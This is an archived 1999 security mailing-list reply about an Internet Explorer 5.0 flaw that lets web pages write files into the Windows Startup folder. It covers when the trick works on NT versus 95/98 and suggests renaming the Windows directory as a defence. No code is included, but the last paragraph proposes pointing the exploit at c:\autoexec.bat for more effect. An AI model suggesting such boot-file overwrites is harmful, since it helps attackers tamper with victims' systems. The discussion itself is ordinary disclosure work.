Re: IE 5.0 allows executing programs

From: STEVENS, Eric (Eric.Stevens@RP-RORER.COM)
Date: Mon Aug 23 1999 - 04:42:04 PDT

    This would probably work on NT machines if in the code the path referenced
    pointed at the startup directory of an existing NT profile.  Unfortunately
    it's impossible to guess the username of the currently logged on user, and
    if you go with something "safe" (i.e. relatively likely to exist) like the
    AllUsers profile, you should get blocked from doing that if permissions are
    set right on NTFS (if the WINSYS drive is NTFS).  I get a JavaScript error
    when I tried Georgi's code since the path "C:\Windows\Start
    Menu\Programs\Startup\" does not exist.  Also this is weakened if in 95/98
    the user does not use the same profile for all users logged on to the
    network.  Although it does still write the file in a dangerous place, since
    it will be executed or whatever if the default user profile logs on.

    This only reaffirms my opinion that anyone who wishes to do something simple
    when setting up a machine the first time to greatly protect themselves,
    should simply change the name of their windows directory.

    Also, I don't know fully how peravsive this exploit is, but if it is capable
    of creating .bat filess, interresting things may be thought to happen if
    instead of the path written in the exploit, one were to instead overwrite
    c:\autoexec.bat.  C:\ is a pretty safe path to guess.

    ___ /--+   _____ eric.stevens@rp-rorer.com _____ \ ___
    __ /      ____ rpr graphics asp design team _____ \ __
    _ `----+ x-eric-conspiracy: there is no conspiracy + _